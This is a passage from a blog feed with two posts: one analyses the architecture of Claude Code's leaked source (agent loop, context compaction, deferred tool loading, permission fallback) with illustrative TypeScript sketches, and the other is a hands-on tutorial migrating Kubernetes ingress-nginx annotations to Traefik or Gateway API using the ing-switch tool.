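    if (state.turns &gt;= maxTurns) break; // budget check as its own stage
    state.turns += 1;

    const reply = await fakeModel(state.messages);
    state.messages.push(`assistant:${reply.text}`);
    yield { kind: "model_response", text: reply.text };

    if (!reply.toolCall) break; // no tool requested: the turn is over

    const output = await runTool(reply.toolCall);
    state.messages.push(`tool:${output}`);
    yield { kind: "tool_result", tool: reply.toolCall, output };
    // Falling through loops back to the model with the tool result appended.
  }
  yield { kind: "done", turns: state.turns };
  return state;
}

// Driver: collect every event the loop emits.
async function collectEvents(): Promise&lt;LoopEvent[]&gt; {
  const events: LoopEvent[] = [];
  for await (const event of agentLoop({ messages: ["user:what is in this repo?"], turns: 0 })) {
    events.push(event);
  }
  return events;
}

collectEvents().then((events) =&gt; console.log(events.map((e) =&gt; e.kind).join(", ")));
</code></pre>
<p>Because the caller drives the generator, pausing a session is just a matter of not asking for the next event, and <code>state</code> is a plain object you can serialize between turns.</p>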
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/87e9c4e9-9bfd-44ac-bdc0-f9fbf5c3d30b.png" alt="" style="display:block;margin:0 auto" />

<h2>Five Compaction Strategies (Not a Neat Stack)</h2>
<p>Every long-running agent eventually fills its context window. Most frameworks handle this by truncating old messages. Claude Code has five distinct strategies — though I want to be clear, these aren't a clean "Layer 1 through 5" hierarchy like some other posts have described. They're composable strategies that kick in under different conditions:</p>
<p><strong>Snip</strong> prunes older messages for quick headroom. Fast and lossy.</p>
<p><strong>Microcompact</strong> targets tool outputs specifically. A 5,000-line file read gets saved to disk; the model sees a summary with a reference. Two implementations handle this: <code>microCompact.ts</code> and <code>apiMicrocompact.ts</code>. This alone is a big deal — a single uncompressed tool output can eat half your context window.</p>
<p><strong>Context Collapse</strong> progressively compresses older conversation segments while keeping recent context sharp. It's still behind a <code>CONTEXT_COLLAPSE</code> feature flag, with dedicated persistence types (<code>ContextCollapseCommitEntry</code>, <code>ContextCollapseSnapshotEntry</code>) to survive session restarts. Not yet fully shipped.</p>
<p><strong>Autocompact</strong> is full-conversation summarization at configurable token thresholds. Replaces older history with a summary.</p>
<p><strong>Reactive Compact</strong> is the emergency brake — behind the <code>REACTIVE_COMPACT</code> feature flag. When the API returns a 413 (payload too large), this aggressively compacts everything so your session doesn't die. Without this, one bad tool output would brick the conversation.</p>
<p>Now, I've seen posts claiming "no other framework has this." That was arguably true in 2025, but it's not true now. Microsoft's <a href="https://learn.microsoft.com/en-us/agent-framework/agents/conversations/compaction">Agent Framework</a> has composable multi-strategy compaction pipelines. <a href="https://blog.langchain.com/context-management-for-deepagents/">LangChain Deep Agents</a> (shipped March 15, 2026) does filesystem offloading plus multi-frequency summarization. <a href="https://google.github.io/adk-docs/context/compaction/">Google ADK</a> has sliding window with summarization.</p>
<p>What sets Claude Code apart isn't that it has compaction — it's the granularity. Five strategies, two of them still being iterated on behind feature flags. That reflects the kind of edge cases you only discover at scale.</p>
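<p>Here's a rough sketch of what "composable strategies that kick in under different conditions" can look like. To be clear, this is my own illustration and not code from the leak: the <code>ChatMessage</code> shape, the thresholds, the characters-per-token estimate, and the in-memory <code>offloaded</code> map (standing in for writing to disk) are all assumptions.</p>
<pre><code class="language-typescript">// Hypothetical message shape and thresholds; none of these names come from the leaked source.
interface ChatMessage {
  role: "user" | "assistant" | "tool";
  content: string;
}

type CompactionStrategy = (messages: ChatMessage[]) =&gt; ChatMessage[];

// Crude token estimate (about 4 characters per token), good enough for a sketch.
function estimateTokens(messages: ChatMessage[]): number {
  return Math.ceil(messages.reduce((sum, m) =&gt; sum + m.content.length, 0) / 4);
}

// Microcompact-style: shrink oversized tool outputs to a preview plus a reference.
// A real system would write the full output to disk; here an in-memory Map stands in.
const offloaded = new Map&lt;string, string&gt;();
const shrinkToolOutputs: CompactionStrategy = (messages) =&gt;
  messages.map((m, i) =&gt; {
    if (m.role !== "tool" || m.content.length &lt;= 200) return m;
    const ref = `tool-output-${i}`;
    offloaded.set(ref, m.content);
    return { ...m, content: `${m.content.slice(0, 80)}... [truncated, full output saved as ${ref}]` };
  });

// Snip-style: keep the first message (the task) and the most recent few.
const snipOldMessages: CompactionStrategy = (messages) =&gt;
  messages.length &lt;= 5 ? messages : [messages[0], ...messages.slice(-4)];

// Apply strategies from least to most lossy, stopping once under budget.
function compact(
  messages: ChatMessage[],
  budgetTokens: number,
  strategies: CompactionStrategy[],
): ChatMessage[] {
  let current = messages;
  for (const strategy of strategies) {
    if (estimateTokens(current) &lt;= budgetTokens) break;
    current = strategy(current);
  }
  return current;
}

const conversation: ChatMessage[] = [
  { role: "user", content: "Summarize server.log" },
  { role: "tool", content: "line\n".repeat(1000) },
  { role: "assistant", content: "The log is mostly repeated lines." },
];
const compacted = compact(conversation, 100, [shrinkToolOutputs, snipOldMessages]);
console.log(estimateTokens(conversation), estimateTokens(compacted));
</code></pre>
<p>The ordering is the design choice worth noticing: the cheap, targeted strategy runs first, and the lossy one only runs if the conversation is still over budget.</p>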
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/17d6086b-cbcc-41f9-8fe6-23f9e71b817d.png" alt="" style="display:block;margin:0 auto" />

<h2>Deferred Tool Loading</h2>
<p>This is probably the most practical pattern in the codebase for anyone building agents.</p>
<p>When you connect MCP servers, you might have 200+ tools available. Sending all those schemas on every API call wastes thousands of tokens. Claude Code's solution: mark tools with <code>defer_loading: true</code>. The model doesn't see them. Instead, it has a single meta-tool called <code>ToolSearch</code> (the internal class is <code>ToolSearchTool</code>, but the model-facing name is <code>ToolSearch</code> — defined as <code>TOOL_SEARCH_TOOL_NAME = 'ToolSearch'</code> in the constants). When the model needs a capability, it calls <code>ToolSearch</code> with a query:</p>
<pre><code class="language-plaintext">User: "Deploy this to my Kubernetes cluster"

Model calls ToolSearch("kubernetes deploy")
  -&gt; System fuzzy-matches deferred tool descriptions
  -&gt; Injects matching schemas into the conversation
Model now has the tools it needs.
</code></pre>
<p>The model goes from ~20 core tools to access to hundreds, without the upfront token cost.</p>
<p>This pattern has spread. The <a href="https://developers.openai.com/api/docs/guides/tools-tool-search">OpenAI Agents SDK</a> now has <code>deferLoading: true</code> with tool search (requires GPT-5.4+). <a href="https://github.com/zeroclaw-labs/zeroclaw">ZeroClaw</a> implements nearly identical deferred loading. <a href="https://github.com/crewAIInc/crewAI/pull/4779">CrewAI 1.10.2a1</a> (March 2026) added dynamic tool injection via Anthropic's tool search API.</p>
<p>But there's still no framework-agnostic library for this. The core is straightforward — fuzzy matching over tool descriptions, schema injection on demand, MCP compatibility. If someone built this as a standalone package, it'd be useful immediately.</p>
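<p>For a sense of how small that core is, here's a sketch under some loud assumptions: the tool names are invented, <code>deferLoading</code> is my camelCase stand-in for the <code>defer_loading</code> flag, and plain keyword overlap stands in for real fuzzy matching. It is not how Claude Code's <code>ToolSearchTool</code> is implemented.</p>
<pre><code class="language-typescript">// Hypothetical tool registry; the tool names and the scoring are illustrative assumptions.
interface ToolSchema {
  name: string;
  description: string;
  deferLoading: boolean;
}

const registry: ToolSchema[] = [
  { name: "read_file", description: "Read a file from the workspace", deferLoading: false },
  { name: "k8s_apply", description: "Deploy manifests to a Kubernetes cluster", deferLoading: true },
  { name: "k8s_logs", description: "Fetch logs from a Kubernetes pod", deferLoading: true },
  { name: "jira_create", description: "Create a Jira ticket", deferLoading: true },
];

// Tools whose schemas are sent on every request.
function initialTools(tools: ToolSchema[]): ToolSchema[] {
  return tools.filter((t) =&gt; !t.deferLoading);
}

// Naive keyword overlap standing in for fuzzy matching: score each deferred tool
// by how many query words appear in its name or description.
function toolSearch(query: string, tools: ToolSchema[], limit = 3): ToolSchema[] {
  const words = query.toLowerCase().split(/\s+/).filter(Boolean);
  return tools
    .filter((t) =&gt; t.deferLoading)
    .map((t) =&gt; {
      const haystack = `${t.name} ${t.description}`.toLowerCase();
      return { tool: t, score: words.filter((w) =&gt; haystack.includes(w)).length };
    })
    .filter((entry) =&gt; entry.score &gt; 0)
    .sort((a, b) =&gt; b.score - a.score)
    .slice(0, limit)
    .map((entry) =&gt; entry.tool);
}

// The active set grows only when the model asks for a capability.
const active = initialTools(registry);
active.push(...toolSearch("kubernetes deploy", registry));
console.log(active.map((t) =&gt; t.name));
</code></pre>
<p>In this toy registry the model starts with one schema and ends up with three after the search; the Jira tool never costs a token because nothing asked for it.</p>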
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0fde2eb1-f66e-48a9-acce-646add485209.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Default-Deny Permissions With a Graceful Fallback</h2>
<p>Claude Code's permission system is built on default-deny. Every tool has two permission-relevant properties defined in <code>Tool.ts</code>:</p>
<ul>
<li><p><code>isReadOnly</code> — defaults to <code>false</code> (assume the tool writes)</p>
</li>
<li><p><code>isDestructive</code> — defaults to <code>false</code></p>
</li>
</ul>
<p>Tools must explicitly declare their risk profile. The permission system then layers rule-based checks (<code>alwaysAllow</code>/<code>alwaysDeny</code> rules), pre-tool-use hooks (which can modify input, block execution, or log), and an auto-mode safety classifier.</p>
<p>The part I found most interesting is the denial tracking in <code>denialTracking.ts</code> — just 46 lines:</p>
<pre><code class="language-plaintext">3 consecutive denials → shouldFallbackToPrompting() returns true
20 total denials in a session → same result
</code></pre>
<p>If the user keeps saying "no," the system stops running in auto-mode and starts asking for explicit permission on every action. Most agent frameworks either keep retrying or hard-stop. Claude Code's approach gracefully degrades: "You're uncomfortable with what I'm doing, so I'll check before each step."</p>
<p>Small file, big principle.</p>
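<p>A sketch of the same idea, reusing the two thresholds above and the <code>shouldFallbackToPrompting</code> name. Everything else is my assumption, including the <code>DenialState</code> shape and the rule that an approval resets the streak; it is not a copy of <code>denialTracking.ts</code>.</p>
<pre><code class="language-typescript">// Thresholds taken from the post (3 consecutive, 20 total); the rest is a hypothetical sketch.
const MAX_CONSECUTIVE_DENIALS = 3;
const MAX_TOTAL_DENIALS = 20;

interface DenialState {
  consecutive: number;
  total: number;
}

function recordDenial(state: DenialState): DenialState {
  return { consecutive: state.consecutive + 1, total: state.total + 1 };
}

// Assumption: an approval resets the streak but not the session total.
function recordApproval(state: DenialState): DenialState {
  return { ...state, consecutive: 0 };
}

function shouldFallbackToPrompting(state: DenialState): boolean {
  return state.consecutive &gt;= MAX_CONSECUTIVE_DENIALS || state.total &gt;= MAX_TOTAL_DENIALS;
}

let state: DenialState = { consecutive: 0, total: 0 };
state = recordDenial(recordDenial(state));
state = recordApproval(state);
console.log(shouldFallbackToPrompting(state)); // false: the streak was reset
state = recordDenial(recordDenial(recordDenial(state)));
console.log(shouldFallbackToPrompting(state)); // true: three denials in a row
</code></pre>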
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/69f00384-911e-4f22-b886-a52b934bc576.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>The Cost Engineering</h2>
<p>These are the details that only matter at Anthropic's scale, but they're instructive:</p>
<p><strong>Sticky-on latches.</strong> When a feature flag activates during a session, it stays on for the rest of that session. Flipping it back would change the system prompt, which busts the prompt cache. The <code>promptCacheBreakDetection.ts</code> file tracks 14 distinct state fields that can invalidate the cache — system prompt hash, tool schema hashes, model changes, beta headers, effort values, and more. Sticky latches prevent unnecessary cache invalidation from mode toggles.</p>
<p><strong>Tool result persistence.</strong> Large outputs get written to disk; the model sees a preview. This isn't just context management — it keeps the cache prefix stable.</p>
<p><strong>Schema stability.</strong> Tool schemas are assembled once at session start and held stable throughout. MCP tools can come and go, but the core schema block doesn't change.</p>
<p>At scale, these optimizations compound significantly.</p>
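<p>The sticky-on latch is the easiest of these to picture in code. This is a sketch of the idea only: <code>StickyLatch</code>, <code>buildSystemPrompt</code>, and the "plan mode" flag are hypothetical names, not anything from the source.</p>
<pre><code class="language-typescript">// Hypothetical latch: once a flag is observed as on, it stays on for the session,
// so anything derived from it (like a system prompt) stops changing.
class StickyLatch {
  private latched = false;

  // Returns true from the first time `current` is true until the session ends.
  observe(current: boolean): boolean {
    if (current) this.latched = true;
    return this.latched;
  }
}

// Stand-in for prompt assembly; a stable string means a stable cache prefix.
function buildSystemPrompt(planModeEnabled: boolean): string {
  return planModeEnabled ? "You are an agent. Plan before acting." : "You are an agent.";
}

const planMode = new StickyLatch();
const flagReadings = [false, true, false, false]; // the raw flag flips back mid-session
const prompts = flagReadings.map((raw) =&gt; buildSystemPrompt(planMode.observe(raw)));

// Count how often the prompt differs from the one before it.
const changes = prompts.slice(1).filter((p, i) =&gt; p !== prompts[i]).length;
console.log(changes); // 1
</code></pre>
<p>Without the latch, the same four readings would change the prompt twice (on, then off again), and each change is a potential cache miss.</p>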
<hr />
<h2>What I Actually Took Away From This</h2>
<p>I'm not going to pretend the leak is a startup idea list or that I discovered things nobody else saw. But analyzing the code did crystallize a few things:</p>
<p><strong>Context management is harder than it looks.</strong> Five strategies, two still behind feature flags, a dedicated <code>promptCacheBreakDetection.ts</code> tracking 14 vectors. This is not a solved problem, even for Anthropic.</p>
<p><strong>Deferred tool loading is becoming table stakes.</strong> Claude Code, OpenAI, ZeroClaw, CrewAI — multiple teams independently arrived at the same pattern. If you're building an agent with more than ~20 tools and you're not doing this, you're wasting tokens.</p>
<p><strong>Permission design matters more than permission features.</strong> The denial tracking system is 46 lines. The principle it encodes — "degrade gracefully when the user loses trust" — is more important than any specific implementation detail.</p>
<p><strong>The real work is in the orchestration.</strong> The model call is one stage out of seven in the main loop. Everything else — state management, compaction, tool loading, permissions, cost optimization — is where the engineering actually lives.</p>
<hr />
<h2>Being Honest About the Process</h2>
<p>Every blog post you've read about this leak was written with AI assistance. This one included. I used Claude to analyze the source modules, identify patterns, and draft the initial structure. I then fact-checked every claim, cross-referencing the actual source code, public documentation, news coverage, and other technical analyses. Where I found errors in my initial draft (and there were several), I corrected them.</p>
<p>The value isn't in pretending I manually read half a million lines of code. It's in doing the verification work to make sure what I'm telling you is actually true. In a sea of AI-generated analysis of AI-generated code, accuracy is the differentiator.</p>
<p>If you spot something wrong, tell me — I'd rather correct it than let it stand.</p>
<p><em>I write about cloud-native, AI engineering, and the infrastructure that makes modern software work. Find me on</em> <a href="https://twitter.com/SaiyamPathak"><em>Twitter</em></a> <em>or</em> <a href="https://linkedin.com/in/saiyampathak"><em>LinkedIn</em></a><em>.</em></p>
]]></content:encoded></item><item><title><![CDATA[The Ingress NGINX Migration Just Got Easier: 119 Annotations, 3 Targets, Impact Ratings]]></title><description><![CDATA[A few months ago, I built ing-switch and wrote about it on kubesimplify. The response was incredible -- people loved the annotation mapping and the visual dashboard.
Since then, ingress-nginx was offi]]></description><link>https://blog.kubesimplify.com/ing-switch-119-annotations-gateway-api-traefik-impact-ratings</link><guid isPermaLink="true">https://blog.kubesimplify.com/ing-switch-119-annotations-gateway-api-traefik-impact-ratings</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Gateway API]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[ingress-nginx]]></category><category><![CDATA[cloud native]]></category><category><![CDATA[migration]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 30 Mar 2026 12:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a6561232-6f6b-451c-86ca-bbf693fbb9a6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A few months ago, I built <a href="https://github.com/saiyam1814/ing-switch">ing-switch</a> and <a href="https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days">wrote about it on kubesimplify</a>. The response was incredible -- people loved the annotation mapping and the visual dashboard.</p>
<p>Since then, <strong>ingress-nginx was officially archived</strong> (March 24, 2026). March 31 is end of life -- zero security patches after that date.</p>
<p>Based on community feedback from KubeCon, this is the biggest update yet: <strong>119 annotations</strong> (up from 50), <strong>Gateway API with Traefik as the provider</strong> (the #1 request), and <strong>impact ratings</strong> on every annotation so you know exactly what matters.</p>
<p>This post walks through a <strong>complete end-to-end migration</strong> on a <a href="https://github.com/loft-sh/vind">vind</a> cluster with actual command outputs.</p>
<h2>Why You Need to Migrate Now</h2>
<ul>
<li><p><strong>Nov 11, 2025:</strong> Kubernetes SIG Network announces ingress-nginx retirement</p>
</li>
<li><p><strong>Jan 29, 2026:</strong> Joint statement from Kubernetes Steering + Security Response Committees urging immediate migration</p>
</li>
<li><p><strong>Mar 24, 2026:</strong> GitHub repository archived (read-only)</p>
</li>
<li><p><strong>Mar 31, 2026:</strong> End of life -- zero support from this date</p>
</li>
</ul>
<p>Chainguard maintains a fork for CVE-level fixes only -- no features, no community PRs, no pre-built images. You're on your own.</p>
<h2>The Three Migration Paths</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/eeadef24-e6cd-455a-847c-34fedd6cd96e.png" alt="" style="display:block;margin:0 auto" />

<table>
<thead>
<tr>
<th>Target</th>
<th>Best For</th>
<th>What Changes</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Traefik v3</strong></td>
<td>Fastest migration, lowest friction</td>
<td>Keep Ingress API, swap annotations to Middleware CRDs</td>
</tr>
<tr>
<td><strong>Gateway API (Envoy)</strong></td>
<td>Future-proof standard</td>
<td>Replace Ingresses with HTTPRoutes, Envoy policies</td>
</tr>
<tr>
<td><strong>Gateway API (Traefik)</strong></td>
<td>Rancher / k3s users</td>
<td>Standard HTTPRoutes + Gateway resources, with Traefik as the controller implementation. Advanced features (rate limiting, auth, IP filtering) use Traefik Middleware CRDs as extension policies.</td>
</tr>
</tbody></table>
<h2>The Annotation Problem</h2>
<p>The real complexity isn't swapping controllers -- it's the <strong>annotations</strong>. A typical production Ingress has 10-15 NGINX annotations for SSL, auth, rate limiting, CORS, session affinity, and more.</p>
<p>ing-switch maps <strong>119 annotations</strong> with impact ratings:</p>
<table>
<thead>
<tr>
<th>Status</th>
<th>Traefik</th>
<th>Gateway API</th>
</tr>
</thead>
<tbody><tr>
<td>Supported (direct equivalent)</td>
<td>35</td>
<td>39</td>
</tr>
<tr>
<td>Partial (needs minor adjustment)</td>
<td>48</td>
<td>25</td>
</tr>
<tr>
<td>Unsupported (with impact notes)</td>
<td>42</td>
<td>62</td>
</tr>
</tbody></table>
<p>Every unsupported annotation gets an <strong>impact rating</strong>: <code>NONE</code> (safe to ignore), <code>LOW</code> (better defaults), <code>MEDIUM</code> (needs workaround), or <code>VARIES</code> (review your snippets). Most teams discover <strong>70%+ of "unsupported" annotations are safe to ignore</strong>.</p>
<h2>End-to-End Demo: vCluster + ing-switch</h2>
<p><a href="https://asciinema.org/a/nOYDQukAC4bzdSVI"><img src="https://asciinema.org/a/nOYDQukAC4bzdSVI.svg" alt="asciicast" style="display:block;margin:0 auto" /></a></p>
<p>Let's walk through a complete migration on a real cluster. We'll use <a href="https://www.vcluster.com/">vCluster</a> to spin up a Kubernetes cluster in Docker, deploy 3 services with NGINX annotations, and migrate them to Gateway API with Traefik.</p>
<h3>Step 1: Create a Cluster</h3>
<pre><code class="language-bash">vcluster create demo --driver docker
</code></pre>
<p>Output:</p>
<pre><code class="language-text">info  Using vCluster driver 'docker' to create your virtual clusters
info  Ensuring environment for vCluster demo...
done  Created network vcluster.demo
info  Starting vCluster standalone demo
done  Successfully created virtual cluster demo
info  Waiting for vCluster to become ready...
done  vCluster is ready
done  Switched active kube context to vcluster-docker_demo
</code></pre>
<p>Verify:</p>
<pre><code class="language-bash">kubectl get namespaces
</code></pre>
<pre><code class="language-text">NAME                 STATUS   AGE
default              Active   16s
kube-flannel         Active   6s
kube-node-lease      Active   16s
kube-public          Active   16s
kube-system          Active   16s
local-path-storage   Active   6s
</code></pre>
<h3>Step 2: Install Ingress NGINX</h3>
<pre><code class="language-bash">helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm install ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx \
  --create-namespace \
  --set controller.service.type=ClusterIP \
  --set controller.admissionWebhooks.enabled=false \
  --wait --timeout 120s
</code></pre>
<pre><code class="language-text">NAME: ingress-nginx
LAST DEPLOYED: Sun Mar 29 11:15:57 2026
NAMESPACE: ingress-nginx
STATUS: deployed
</code></pre>
<pre><code class="language-bash">kubectl get pods -n ingress-nginx
</code></pre>
<pre><code class="language-text">NAME                                        READY   STATUS    RESTARTS   AGE
ingress-nginx-controller-5486dbd97f-vc9wv   1/1     Running   0          54s
</code></pre>
<h3>Step 3: Deploy 3 Apps with NGINX Annotations</h3>
<p>We deploy three services, each with different annotation patterns:</p>
<p><strong>App 1 -- Basic web app</strong> (SSL redirect + timeouts):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: web-app
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/ssl-redirect: "true"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "60"
    nginx.ingress.kubernetes.io/proxy-connect-timeout: "10"
spec:
  ingressClassName: nginx
  rules:
  - host: web.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: web-app
            port:
              number: 80
</code></pre>
<p><strong>App 2 -- API with CORS + rate limiting</strong> (10 annotations):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: api-cors
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
    nginx.ingress.kubernetes.io/enable-cors: "true"
    nginx.ingress.kubernetes.io/cors-allow-origin: "https://app.example.com,https://admin.example.com"
    nginx.ingress.kubernetes.io/cors-allow-methods: "GET, POST, PUT, DELETE, OPTIONS"
    nginx.ingress.kubernetes.io/cors-allow-headers: "Content-Type, Authorization, X-API-Key"
    nginx.ingress.kubernetes.io/cors-allow-credentials: "true"
    nginx.ingress.kubernetes.io/cors-max-age: "86400"
    nginx.ingress.kubernetes.io/limit-rps: "50"
    nginx.ingress.kubernetes.io/limit-burst-multiplier: "3"
    nginx.ingress.kubernetes.io/proxy-body-size: "5m"
spec:
  ingressClassName: nginx
  rules:
  - host: api.example.com
    http:
      paths:
      - path: /v1
        pathType: Prefix
        backend:
          service:
            name: api-service
            port:
              number: 80
</code></pre>
<p><strong>App 3 -- Auth-protected dashboard</strong> (external auth + IP allowlist + session affinity):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: dashboard
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/ssl-redirect: "true"
    nginx.ingress.kubernetes.io/auth-url: "https://auth.example.com/verify"
    nginx.ingress.kubernetes.io/auth-response-headers: "X-User-ID,X-User-Email"
    nginx.ingress.kubernetes.io/whitelist-source-range: "10.0.0.0/8,172.16.0.0/12"
    nginx.ingress.kubernetes.io/affinity: "cookie"
    nginx.ingress.kubernetes.io/session-cookie-name: "dashboard-session"
    nginx.ingress.kubernetes.io/session-cookie-max-age: "3600"
spec:
  ingressClassName: nginx
  rules:
  - host: dashboard.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: dashboard
            port:
              number: 80
</code></pre>
<p>After applying all three:</p>
<pre><code class="language-bash">kubectl get ingress -n demo
</code></pre>
<pre><code class="language-text">NAME        CLASS   HOSTS                   ADDRESS   PORTS   AGE
api-cors    nginx   api.example.com                   80      5s
dashboard   nginx   dashboard.example.com             80      5s
web-app     nginx   web.example.com                   80      5s
</code></pre>
<pre><code class="language-bash">kubectl get pods -n demo
</code></pre>
<pre><code class="language-text">NAME                           READY   STATUS    RESTARTS   AGE
api-service-5f99b6d99d-x7vmn   1/1     Running   0          24s
dashboard-9ddbf867-7dbgf       1/1     Running   0          24s
web-app-969c76b7c-7wqw5        1/1     Running   0          24s
</code></pre>
<p>3 ingresses, 20 NGINX annotations, 3 services running. Now let's see what ing-switch makes of this.</p>
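<p>If you want to sanity-check that annotation count on your own cluster, a minimal sketch follows. It assumes each annotation sits on its own YAML line under <code>metadata.annotations</code>; the helper name <code>count_nginx_annotations</code> is made up for illustration and is not part of ing-switch.</p>
<pre><code class="language-bash"># Hypothetical helper: count NGINX annotation lines in YAML read from stdin.
# The leading-whitespace anchor skips the last-applied-configuration JSON blob.
count_nginx_annotations() {
  grep -c '^ *nginx\.ingress\.kubernetes\.io/'
}

# Against the live cluster (assumes kubectl points at the demo cluster):
#   kubectl get ingress -n demo -o yaml | count_nginx_annotations

# Offline check using the three web-app annotations from Step 3:
printf '%s\n' \
  'metadata:' \
  '  annotations:' \
  '    nginx.ingress.kubernetes.io/ssl-redirect: "true"' \
  '    nginx.ingress.kubernetes.io/proxy-read-timeout: "60"' \
  '    nginx.ingress.kubernetes.io/proxy-connect-timeout: "10"' \
  | count_nginx_annotations
# prints 3
</code></pre>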
<h3>Step 4: Scan the Cluster</h3>
<pre><code class="language-bash">ing-switch scan
</code></pre>
<pre><code class="language-text">  ing-switch -- Cluster Scan Results
  Cluster: vcluster-docker_demo

  Ingress Controller Detected
  Type:      ingress-nginx
  Version:   unknown
  Namespace: ingress-nginx

  Found 3 Ingress resource(s)

  NAMESPACE   NAME        HOSTS                   ANNOTATIONS   TLS   COMPLEXITY
  ---------   ----        -----                   -----------   ---   ----------
  demo        api-cors    api.example.com         10            no    unsupported
  demo        dashboard   dashboard.example.com   7             no    complex
  demo        web-app     web.example.com         3             no    complex
</code></pre>
<p>ing-switch detected the NGINX controller and found all 3 ingresses with their annotation counts and complexity scores.</p>
<h3>Step 5: Analyze Compatibility</h3>
<p>Let's compare all three targets:</p>
<p><strong>Traefik v3:</strong></p>
<pre><code class="language-bash">ing-switch analyze --target traefik
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     1
  Needs workarounds:    2
  Has unsupported:      0
</code></pre>
<p><strong>Gateway API (Envoy):</strong></p>
<pre><code class="language-bash">ing-switch analyze --target gateway-api
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     0
  Needs workarounds:    3
  Has unsupported:      0
</code></pre>
<p><strong>Gateway API (Traefik):</strong></p>
<pre><code class="language-bash">ing-switch analyze --target gateway-api-traefik
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     0
  Needs workarounds:    3
  Has unsupported:      0
</code></pre>
<p>Key insight: <strong>Traefik is the highest-compatibility target</strong> for this workload (1 fully compatible out of 3). The CORS annotations map directly to Traefik's Headers middleware. For Gateway API, CORS is now also fully supported thanks to the native CORS filter in Gateway API v1.5.</p>
<p>Here's the detailed annotation mapping for the API with CORS under the Gateway API target:</p>
<pre><code class="language-text">  demo/api-cors
  -------------
  ANNOTATION               STATUS        TARGET RESOURCE                    NOTES
  enable-cors              [supported]   HTTPRoute (CORS filter)            Native CORS filter (GA in Gateway API v1.5)
  cors-allow-origin        [supported]   HTTPRoute (CORS filter)            allowOrigins in CORS filter
  cors-allow-methods       [supported]   HTTPRoute (CORS filter)            allowMethods in CORS filter
  cors-allow-headers       [supported]   HTTPRoute (CORS filter)            allowHeaders in CORS filter
  cors-allow-credentials   [supported]   HTTPRoute (CORS filter)            allowCredentials in CORS filter
  cors-max-age             [supported]   HTTPRoute (CORS filter)            maxAge in CORS filter
  force-ssl-redirect       [supported]   HTTPRoute (RequestRedirect filter) 301 redirect to HTTPS
  limit-rps                [partial]     BackendTrafficPolicy (RateLimit)   Envoy Gateway BackendTrafficPolicy
  limit-burst-multiplier   [partial]     BackendTrafficPolicy (RateLimit)   Burst configurable but uses tokens
  proxy-body-size          [partial]     BackendTrafficPolicy               requestBuffer.limit
</code></pre>
<p>7 out of 10 annotations are fully supported. The 3 "partial" ones work -- they just use a slightly different API.</p>
<h3>Step 6: Generate Migration Files</h3>
<pre><code class="language-bash">ing-switch migrate --target gateway-api-traefik --output-dir ./migration
</code></pre>
<pre><code class="language-text">  ing-switch -- Generating Migration Files
  Target:     gateway-api-traefik
  Output dir: ./migration

  + 00-migration-report.md
  + 01-install-gateway-api-crds/install.sh
  + 02-install-traefik-gateway/helm-install.sh
  + 02-install-traefik-gateway/values.yaml
  + 03-gateway/gatewayclass.yaml
  + 03-gateway/gateway.yaml
  + 04-httproutes/demo-api-cors.yaml
  + 04-httproutes/demo-dashboard.yaml
  + 04-httproutes/demo-web-app.yaml
  + 05-policies/demo-api-cors-ratelimit.yaml
  + 05-policies/demo-dashboard-forwardauth.yaml
  + 05-policies/demo-dashboard-ipallowlist.yaml
  + 06-verify.sh
  + 07-cleanup/remove-nginx.sh
  Generated 13 files in ./migration/
</code></pre>
<h3>Step 7: Inspect the Generated YAML</h3>
<p><strong>GatewayClass -- points to Traefik, not Envoy:</strong></p>
<pre><code class="language-yaml">apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: traefik
spec:
  controllerName: traefik.io/gateway-controller
</code></pre>
<p><strong>HTTPRoute with native CORS filter</strong> (no more ResponseHeaderModifier hacks):</p>
<pre><code class="language-yaml">apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: api-cors
  namespace: demo
spec:
  parentRefs:
  - name: ing-switch-gateway
    namespace: default
  hostnames:
  - "api.example.com"
  rules:
  - matches:
    - path:
        type: PathPrefix
        value: "/v1"
    filters:
    - type: CORS
      cors:
        allowOrigins:
        - type: Exact
          value: "https://app.example.com"
        - type: Exact
          value: "https://admin.example.com"
        allowMethods:
        - "GET"
        - "POST"
        - "PUT"
        - "DELETE"
        - "OPTIONS"
        allowHeaders:
        - "Content-Type"
        - "Authorization"
        - "X-API-Key"
        allowCredentials: true
        maxAge: "86400s"
    backendRefs:
    - name: api-service
      port: 80
</code></pre>
<p><strong>Traefik Middleware CRDs</strong> (not Envoy-specific policies):</p>
<pre><code class="language-yaml"># Rate Limiting
